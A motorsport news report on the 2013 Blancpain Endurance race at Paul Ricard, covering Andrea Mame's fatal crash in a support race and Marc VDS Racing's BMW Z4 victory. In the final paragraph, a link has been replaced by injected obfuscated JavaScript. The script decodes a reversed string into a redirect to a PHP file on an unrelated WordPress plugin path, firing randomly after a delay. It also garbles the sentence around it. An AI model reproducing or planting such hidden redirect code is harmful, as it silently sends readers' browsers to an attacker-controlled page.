The death of Italian Andrea Mame casts a shadow on Blancpain victory at Paul Ricard for the Marc VDS Racing Team.

In the light of what took place pre-event, Marc VDS Racing Team’s victory at Paul Ricard was bittersweet at best. News that Andrea Mame had been killed in the supporting Lamborghini Blancpain Super Trofeo race following a collision with four other competitors at the start of the race shocked the paddock. The Italian was 41 years old.

Nerves were therefore high in the Blancpain Endurance paddock as the 60+ strong grid took the start, though fate would fortunately not strike twice. The polesiting Marc VDS BMW Z4 of Bas Leinders, Yelmer Buurman and Maxime Martin stretched its legs in the early going, ahead of the Hexis Racing McLaren 12C GT3 of Stef Dusseldorp, Alexander Sims and Alvaro Parente. The race lead would be short-lived though, the Hexis squad leaping to the front at the first round of pit stops.

The three hour event looked set to be a walk over for the #3 Leinders/Buurman /Martin Beemer, though the #44 Kessel Racing entry of Cesar Ramos, Daniele Zampieri and Davide Rigon – following a charge from fourth on the grid – attempted to prove otherwise. Going into the final hour, Ramos in the Kessel Ferrari 458 Italia was forced to make a final pit stop, unleashing the Marc VDS BMW. With just ten minutes of the race to run, Martin in the Z4 made his move for the lead on Sims in the 12C, and ultimately took the chequered flag nine seconds clear of the Hexis car. Kessel Racing came home third.

Following their double podium at Silverstone, the Belgian Club WRT outfit suffered an inconsistent weekend at Paul Ricard, the lead #1 Audi R8 LMS Ultra of Stephane Ortelli, Laurens Vanthoor and Rene Rast unable to better ninth. David Dermont and Frederic Vervich meanwhile, just two places behind, secured Pro-Am victory aboard the Boutsen Ginion McLaren 12C GT3 ahead of Mark Shulzhitskiy, Steve Doherty and $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-track/2013-blancpain-endurance-round-2-silverstone-lucky-for-some/” target=”_blank”>Silverstone Pro-Am class winner Alex Buncombe in the Nissan GT Academy Team RJN GT-R GT3 Nismo.
